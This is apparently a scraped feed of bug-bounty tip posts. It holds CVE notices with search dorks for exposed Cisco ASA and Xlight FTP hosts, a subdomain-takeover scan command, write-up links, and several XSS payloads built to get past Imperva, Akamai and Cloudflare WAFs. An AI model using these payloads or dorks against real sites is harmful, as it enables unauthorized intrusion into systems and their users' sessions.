POC for CVE-2024-4577 PHP CGI Argument Injection 🔥 🔥 🔥
Nuclei Template: https://github.com/11whoami99/CVE-2024-4577/blob/main/CVE-2024-4577.yaml
Here are a few good GraphQL reports to learn more about it.
1. hackerone.com/reports/2048725
2. hackerone.com/reports/2524939
3. hackerone.com/reports/2357012
4. hackerone.com/reports/2122671
5. hackerone.com/reports/2207248
6. hackerone.com/reports/1864188
7. hackerone.com/reports/1085332
8. hackerone.com/reports/1084904
9. hackerone.com/reports/1293377
10. hackerone.com/reports/1192460
HackerOne
Sorare disclosed on HackerOne: Circular based introspection Query...
## Summary:
Hi Team, Hope you are doing great Sorare graphql Api has introspection enabled by default as per the policy it's meant to be public so they can facilitate their users with Graphql...
Subdomain Takeover POC :
subfinder -d domain | httpx -silent > subdomains.txt ; nuclei -t /root/nuclei-templates/http/takeovers -l subdomains.txt
80% of bug bounties is about understanding the application/framework/protocol and (knowing what exactly you are doing, or whether it's actually worth doing).
CVE-2024-20329: Improper Neutralization of Command Delimiters in Cisco ASA, 9.9 rating 🔥🔥🔥
The vulnerability allows an attacker with low privileges to remotely execute commands via SSH and thus gain full control of the system.
More than 140k instances at Netlas.io:
👉 Link: https://nt.ls/Rfjme
👉 Dork: http.body:"/+CSCOE+/logon.html"
Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF
Gist
I’ve analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques. After extensive research, I’ve compiled a list of headers y...
⚡️Found a security vulnerability in any site?
✅Check if it has a public bug bounty program:
https://xplo1t-sec.github.io/bugbounty-lookup/
#BugBounty #bugbountytips
A solid XSS payload that bypasses Imperva WAF ⚙️
#infosec #cybersec #bugbountytips
<a/href="j%0A%0Davanoscript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
Reflected XSS Akamai WAF Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:⚙️
/login?ReturnUrl=javanoscript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529
Cloudflare #XSS WAF Bypass by @nav1n0x
Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
#cybersec #bugbountytips #infosec
an XSS payload to bypass some waf & filters in Firefox
#infosec #cybersec #bugbountytips
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
Retrieves DNS records without any authentication
Replace example.com with the target domain.
curl -s "https://api.hackertarget.com/dnslookup/?q=example.com"
Brut Security pinned «🚨 If you're looking for accurate IoT results, then Sign Up On @Netlas 😮💨 https://app.netlas.io/ref/9cc61538/»
1) Finding a Hidden GraphQL Endpoint
https://medium.com/@codingbolt.in/finding-a-hidden-graphql-endpoint-56001ab29f85
2) My 2nd bounty: Referer-based access control + Response manipulation
https://medium.com/@adebayosec/my-2nd-bounty-referer-based-access-control-response-manipulation-2ab7f54d083f
3) CSRF Bypass Using Domain Confusion Leads To ATO
https://infosecwriteups.com/csrf-bypass-using-domain-confusion-leads-to-ato-ac682dd17722
4) Linear-feedback Shift Register
https://cyancharley.medium.com/linear-feedback-shift-register-ac6fc3298c35
5) ASCWG Reverse Engineering challenges
https://s3dny.medium.com/ascwg-reverse-engineering-challenges-778e47a5be80
6) picoCTF: No SQL Injection
https://medium.com/@baracarlo/picoctf-no-sql-injection-93a253cc4d09
7) Sunset:1 Walkthrough
https://medium.com/@nikhilbwr34/sunset-1-walkthrough-d124d06fcc93
8) Gixposed is a powerful command-line tool designed to search the commit history of Git repositories for sensitive information, such as API keys and access tokens
https://github.com/WH1T3-E4GL3/gixposed
9) MM-ReverseIPLookup, created to take a domain name and find all (A) records associated with an IP address using multiple free sources
https://github.com/FINAL094/MM-ReverseIPLookup
10) Hidden secrets and urls in JS Mass hunting || Bug bounty POC
https://www.youtube.com/watch?v=HAAG5_mSxdk
CVE-2024-46483: Integer Overflow in Xlight FTP Server, 9.8 rating 🔥
By overflowing the variable, an attacker could cause remote code execution on the host or a denial of service.
Search at Netlas.io:
👉 Link: https://nt.ls/M8D2R
👉 Dork: \*.banner:"Xlight" OR raw_tcp.response_data:"Xlight"
Read more: https://github.com/kn32/cve-2024-46483